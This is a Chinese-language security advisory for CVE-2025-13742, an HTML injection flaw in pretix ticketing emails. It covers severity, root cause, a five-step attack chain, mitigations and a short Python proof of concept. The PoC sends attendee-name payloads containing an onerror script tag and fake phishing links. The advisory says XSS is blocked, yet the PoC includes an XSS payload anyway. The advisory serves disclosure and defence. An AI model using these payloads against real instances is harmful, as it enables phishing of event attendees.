CVE-2025-13742 pretix邮件模板HTML注入漏洞

漏洞信息

漏洞编号

CVE-2025-13742

漏洞类型

HTML注入/邮件伪造

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

pretix

漏洞概述

CVE-2025-13742是pretix事件票务系统中一个中危级别的HTML注入漏洞。该漏洞存在于pretix的邮件发送功能中，系统允许在邮件模板中使用占位符（如{name}），这些占位符会在发送邮件时自动替换为客户数据（如购票者姓名）。然而，当参会者的姓名包含HTML或Markdown格式内容时，这些格式会在最终生成的邮件中被直接渲染为HTML。这意味着攻击者可以通过在姓名字段中注入恶意的HTML或Markdown代码来操纵邮件内容。由于pretix对允许的HTML标签实施了严格的允许列表（白名单）策略，传统的XSS攻击无法实现，但攻击者仍然可以利用这一漏洞在邮件中注入链接或格式化文本，使钓鱼内容看起来更加可信和可信，从而实施钓鱼攻击。攻击者无需认证即可利用此漏洞，但需要诱导受害者查看或点击恶意邮件。

技术细节

该漏洞的根本原因在于pretix的邮件模板系统在处理用户输入时缺乏充分的输出编码。系统允许用户在姓名等字段中输入包含HTML或Markdown的内容，这些内容在填充到邮件模板后会被直接渲染。当用户在邮件模板中使用占位符（如{name}、{attendee_name}等）时，系统会直接将该字段的内容插入到HTML邮件正文中，而没有对特殊字符进行转义或过滤。攻击者可以利用这一特性在邮件中注入任意链接、格式化文本或图片链接，从而创建看起来来自合法来源的钓鱼邮件。虽然系统使用了HTML标签白名单机制来防止危险的HTML标签（如<script>标签），但攻击者仍然可以使用<a>标签创建可信的钓鱼链接，或使用其他视觉欺骗技术。由于邮件的HTML渲染特性，攻击者可以轻易地伪造发件人信息不明显的钓鱼内容，诱导收件人点击恶意链接。

攻击链分析

STEP 1

步骤1

攻击者注册pretix账户或在受影响的活动中购票

STEP 2

步骤2

攻击者在姓名字段中输入包含HTML或Markdown的恶意内容，如钓鱼链接或伪装文本

STEP 3

步骤3

系统管理员或用户触发邮件发送（如订单确认邮件），邮件模板中的占位符被替换为攻击者控制的姓名

STEP 4

步骤4

邮件内容中的HTML标签被直接渲染，钓鱼链接或恶意内容以可信的方式呈现在邮件正文中

STEP 5

步骤5

邮件收件人收到看起来来自pretix的合法邮件，点击其中的恶意链接，进入钓鱼网站或泄露敏感信息

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-13742 PoC - pretix HTML Injection in Email Templates # This PoC demonstrates how an attacker can inject HTML into email templates # through maliciously formatted attendee names import requests import json # Target pretix instance TARGET_URL = "https://pretix-instance.com" API_KEY = "your-api-key" ORGANIZER_SLUG = "your-organizer" EVENT_SLUG = "your-event" # Malicious name payload with HTML injection malicious_name = """ <img src=x onerror='alert("XSS")'> <a href='https://evil-phishing-site.com'>Click here for FREE tickets!</a> **Phishing Link** """ # Alternative payload for phishing phishing_payload = """ Your order has been confirmed. <a href='https://fake-pretix-login.com/reset?token=stolen'>Click here to verify your account</a> """ # Register attendee with malicious name def register_attendee(): endpoint = f"{TARGET_URL}/api/v1/organizers/{ORGANIZER_SLUG}/events/{EVENT_SLUG}/orders/" headers = { "Authorization": f"Token {API_KEY}", "Content-Type": "application/json" } payload = { "email": "[email protected]", "name": phishing_payload, "locale": "en" } # This payload will be rendered in email templates response = requests.post(endpoint, json=payload, headers=headers) return response.json() # Email template vulnerable code pattern vulnerable_template = """  <html> <body> <p>Dear {name},</p>  <p>Your ticket is ready.</p> </body> </html> """ print("CVE-2025-13742 PoC - pretix HTML Injection") print("Register attendee with malicious name to inject HTML into emails")

影响范围

pretix < 2025.9.1

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 在用户注册和购票流程中添加输入验证，拒绝或过滤姓名字段中的HTML标签；2) 禁用邮件模板中的富文本渲染功能，使用纯文本模式发送邮件；3) 在邮件网关处添加内容过滤规则，检测和阻止邮件中的可疑链接；4) 提醒用户在点击邮件链接时仔细检查URL，避免点击来源不明的链接；5) 启用邮件DMARC、DKIM和SPF验证，帮助收件人识别伪造邮件。